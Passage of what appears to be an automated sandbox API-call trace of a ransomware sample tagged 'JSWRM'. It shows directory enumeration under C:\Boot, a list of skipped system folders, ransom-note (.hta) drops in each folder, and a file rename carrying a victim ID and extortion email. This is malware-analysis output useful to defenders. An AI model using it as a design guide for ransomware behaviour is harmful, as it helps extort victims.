dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.790] CreateFileW (lpFileName="C:\\Boot\\et-EE\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\et-ee\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.790] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.790] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.791] CloseHandle (hObject=0x450) returned 1 [0063.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0063.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.792] GetFileAttributesW (lpFileName="C:\\Boot\\et-EE\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\et-ee\\jswrm-decrypt.hta")) returned 0x20 [0063.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0063.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.792] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1caf7c51, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0063.793] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.793] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1caf7c51, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.793] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.793] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.793] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.793] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.794] CreateFileW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.794] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.794] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.795] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.795] CloseHandle (hObject=0xffffffff) returned 1 [0063.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0063.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0063.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0063.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0063.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0063.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.796] MoveFileW (lpExistingFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.796] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1caf7c51, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1caf7c51, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1caf7c51, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.796] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.796] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1caf7c51, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1caf7c51, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1caf7c51, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0063.796] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0063.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0063.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.797] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2=".") returned 1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2="..") returned 1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2="...") returned 1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2="windows") returned -1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2="recovery") returned -1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2="perflogs") returned -1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2="documents and settings") returned 1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2="$RECYCLE.BIN") returned 1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2="system volume information") returned -1 [0063.797] lstrcmpiW (lpString1="fi-FI", lpString2="msocache") returned -1 [0063.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0063.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0063.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373a8 [0063.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.797] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fi-fi\\jswrm-decrypt.hta")) returned 0xffffffff [0063.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373a8 | out: hHeap=0x1e0000) returned 1 [0063.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0063.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0063.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237448 [0063.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.798] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fi-fi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.805] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.805] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.806] CloseHandle (hObject=0x450) returned 1 [0063.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237448 | out: hHeap=0x1e0000) returned 1 [0063.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0063.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236fe8 [0063.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.807] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fi-fi\\jswrm-decrypt.hta")) returned 0x20 [0063.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236fe8 | out: hHeap=0x1e0000) returned 1 [0063.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.807] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cb1deb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232180 [0063.807] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.807] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cb1deb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.808] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.808] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.808] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.808] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0063.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0063.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 